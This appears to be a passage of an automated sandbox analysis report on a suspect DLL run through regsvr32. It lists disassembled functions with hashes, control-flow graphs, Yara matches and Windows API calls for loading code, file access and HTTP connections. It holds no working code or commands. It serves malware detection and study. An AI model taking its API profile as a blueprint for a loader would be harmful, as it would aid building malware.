                                                                                                                                            • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                            • API String ID: 394283112-2517549848
                                                                                                                                            • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                            • Instruction ID: e2e9fb7d932ac9b25eba3a50c247e4c987db7d5ab23d5cc6feb67194c9b3d9eb
                                                                                                                                            • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                            • Instruction Fuzzy Hash: 8972D631628B4C8FDB19DF18C8956B9B7F1FB98305F20462DE89AC7211DB34DA46CB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 511 1800248b0-18002490f call 18001feb0 514 180024914 511->514 515 180024916-18002491b 514->515 516 180024921-180024926 515->516 517 180024e2c-180024e96 call 18002a534 515->517 519 180024b7b-180024ba7 516->519 520 18002492c-180024931 516->520 523 180024e9b-180024e9d 517->523 521 180024e0d-180024e22 519->521 522 180024bad-180024bb2 519->522 524 180024937-18002493c 520->524 525 180024b6d-180024b76 520->525 521->517 528 180024bd3-180024bd5 522->528 529 180024bb4-180024bbb 522->529 530 180024ea9-180024eb6 523->530 531 180024e9f-180024ea4 523->531 526 180024942-180024947 524->526 527 180024ec7-180024f09 call 18001ce90 524->527 525->515 533 180024a99-180024b44 call 18001fa00 526->533 534 18002494d-180024952 526->534 545 180024f0e-180024f26 527->545 535 180024bc9-180024bce 528->535 537 180024bd7-180024da0 call 180020aa0 call 180022520 call 1800248b0 528->537 529->535 536 180024bbd-180024bc1 529->536 539 180024ebb-180024ec0 530->539 538 180024b5b-180024b68 531->538 549 180024b49-180024b50 533->549 534->539 541 180024958-180024a94 call 1800234d8 call 180001400 call 180029480 534->541 535->515 536->528 542 180024bc3-180024bc7 536->542 558 180024da5-180024e08 call 180029480 537->558 538->515 544 180024ec2 539->544 539->545 541->514 542->528 542->535 544->515 549->545 552 180024b56 549->552 552->538 558->535
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_17_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: O}$X$bW
                                                                                                                                            • API String ID: 0-980370356
                                                                                                                                            • Opcode ID: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                                                                                                            • Instruction ID: a62d154362f2d503ef0efb6b3a203e4a1ee478d45050cbe1ab820923c54e17f6
                                                                                                                                            • Opcode Fuzzy Hash: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                                                                                                            • Instruction Fuzzy Hash: AA02F4715087C88BD799CFA8C48A69EFBE1FB98744F104A1DF4868B260D7F4D949CB42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 562 180006b24-180006b65 563 180006b67-180006b6c 562->563 564 180006b72-180006b77 563->564 565 180006da8-180006e6a call 180029374 563->565 566 180006b79-180006b7e 564->566 567 180006b8b-180006c09 call 180008900 564->567 573 180006e76-180006e7a 565->573 574 180006e6c-180006e71 565->574 569 180006b84-180006b89 566->569 570 180006e7f-180006e84 566->570 575 180006c0e-180006c13 567->575 569->563 570->563 576 180006e8a-180006e8d 570->576 573->570 577 180006d9a-180006da3 574->577 578 180006c19-180006c1e 575->578 579 180006e8f-180006f04 call 180024104 575->579 576->579 580 180006f06-180006f0d 576->580 577->563 578->576 582 180006c24-180006c29 578->582 581 180006f11-180006f2b 579->581 580->581 582->577 584 180006c2f-180006cef call 180029374 582->584 584->576 588 180006cf5-180006d94 call 18002071c call 180024104 584->588 588->576 588->577
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_17_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: "Gd$C2$HG
                                                                                                                                            • API String ID: 0-142661339
                                                                                                                                            • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                                                                                            • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                                                                                                            • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                                                                                            • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_17_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $!$e##
                                                                                                                                            • API String ID: 0-2900154246
                                                                                                                                            • Opcode ID: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                                                                                                            • Instruction ID: 216da8bcfa57d9aa83ad41f20fe658cab1eb670466840fb7186bd91b9371edf3
                                                                                                                                            • Opcode Fuzzy Hash: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                                                                                                            • Instruction Fuzzy Hash: 7B8190705187889BD7E8DF14C4C979EBBE1FB98344F905A1CF89A8B261CB74C948CB42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 403 18002446c-1800244c1 call 18001feb0 406 1800244c7-180024552 call 180026974 403->406 407 180024558-18002456e InternetOpenW 403->407 406->407
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_17_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InternetOpen
                                                                                                                                            • String ID: &J@$Va$Z*
                                                                                                                                            • API String ID: 2038078732-1197100596
                                                                                                                                            • Opcode ID: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                                                                                                            • Instruction ID: 28a15b3c09fe6a2aa9f5eb42736a691d582ff290fd3432c8dba93e18a197623f
                                                                                                                                            • Opcode Fuzzy Hash: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                                                                                                            • Instruction Fuzzy Hash: 8A212F715187898FD3A8DF28C0493ABB7E1FB98319F408A1DE4CAC6391DB799448CB06
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 629 18001bf0c-18001bfb0 call 18001feb0 632 18001bfb2-18001c02b call 180026974 629->632 633 18001c031-18001c063 CreateFileW 629->633 632->633
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_17_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID: `/
                                                                                                                                            • API String ID: 823142352-1163903809
                                                                                                                                            • Opcode ID: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                                                                                                            • Instruction ID: f11eb3e7a352e1f1819d3b1e5829977cbaca57bf71308e5d5317c3bcacfeb84e
                                                                                                                                            • Opcode Fuzzy Hash: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                                                                                                            • Instruction Fuzzy Hash: 6C3137B061CB848FD364DF18D48579ABBE0FB88314F504A2EE88DC3362DB749845CB86
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_17_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConnectInternet
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3050416762-0
                                                                                                                                            • Opcode ID: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                                                                                                            • Instruction ID: 6bd4319daaf70d9cfa93cd172db4ac0144cd1887b423fd46bbb7d9a578168b32
                                                                                                                                            • Opcode Fuzzy Hash: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                                                                                                            • Instruction Fuzzy Hash: 8C41F7705087848FC7B8DF58D48579ABBE0FB98315F108A5EE48DD7361DB749884CB86
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_17_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InformationVolume
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2039140958-0
                                                                                                                                            • Opcode ID: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                                                                                                            • Instruction ID: e87697cfd510fd4059a611545946932b1d04e28e1a34b551021fd5cd6805f499
                                                                                                                                            • Opcode Fuzzy Hash: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                                                                                                            • Instruction Fuzzy Hash: AB31E770618B888FD7B8CF68D4857AAB7E1FB89315F508A1EE48DC7251CB749845CB43
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_17_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1984915467-0
                                                                                                                                            • Opcode ID: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                                                                                                            • Instruction ID: c8d36c456ba033a28ec6fbd746a54a3663befea28eedef4c15a9fc959fe4c155
                                                                                                                                            • Opcode Fuzzy Hash: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                                                                                                            • Instruction Fuzzy Hash: D331607050CB848BE7B4DF08D4C9B9AB7E0FB98315F108A4DE48DD7296CB789484CB46
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_17_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            • Opcode ID: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                                                                                                            • Instruction ID: 87f7a9be59381a5b3d954798ed335bb6745bcd8ebd0cdd375d804fe942fcfa66
                                                                                                                                            • Opcode Fuzzy Hash: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                                                                                                            • Instruction Fuzzy Hash: 7A312B7160CB848FDBA8DF18E48579AB7E1FB98314F10465EE88CC7396DB309984CB46
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%